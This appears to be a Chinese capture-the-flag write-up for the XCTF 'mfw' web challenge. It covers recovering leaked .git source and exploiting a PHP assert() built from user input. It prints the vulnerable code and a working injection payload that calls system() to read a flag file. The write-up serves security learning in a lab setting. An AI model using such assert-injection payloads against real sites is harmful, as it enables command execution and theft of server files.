mfw 攻防世界 git原始碼洩露

2022-09-10 05:00:12 字數 860 閱讀 4281

可以通過這裡懷疑有.git洩露

訪問/.git/目錄,發現有

用githack破解得到原始碼

注意:githack只能用python2

<?php 

if (isset($_get['page']))

else

$file = "templates/" . $page . ".php";

//i heard '..' is dangerous!

assert("strpos('$file', '..') === false") or die("detected hacking attempt!");

//todo: make this look nice

assert("file_exists('$file')") or die("that file doesn't exist!");

?>

可以知道$file變數是由使用者拼接的,我們可以先閉合strpos,然後把後面注釋掉,中間就可以構造我們想要得到的內容

所以我們可以構造:

?page=').system('cat templates/flag.php');//

通過'.'拼接字串或者用or,執行後面的**,在f12中得到flag

攻防世界mfw 攻防世界 Web mfw

題目資訊 image.png 工具 githack,dirsearch 知識點 git漏洞 審計 開啟題目場景,檢查 發現這樣乙個頁面 image.png 訪問.git目錄,疑似存在git原始碼洩露 image.png 再用dirsearch掃瞄,發現git原始碼洩露 使用 githack獲取原始碼...

git原始碼洩露

0x00 原理 在 安全維護方面,git和svn資訊洩露是非常常見也是非常致命的乙個漏洞。當前大量開發人員使用git進行版本控制,對站點自動部署。如果配置不當,可能會將.git資料夾直接部署到線上環境。這就引起了git洩露漏洞。githack是乙個.git洩露利用指令碼,通過洩露的.git資料夾下的...

XCTF攻防世界web高階練習 mfw

xctf攻防世界web高階練習 mfw題目為mfw,沒有任何提示。直接開啟題目,是乙個 大概瀏覽一下其中的內容,看到其中url變化其實只是get的引數的變化 檢視它的原始碼,看到有乙個?page flag,flag應該在這個頁面裡面 但是進入這個頁面發現是空的 注意到有這樣乙個頁面,說道用到了git...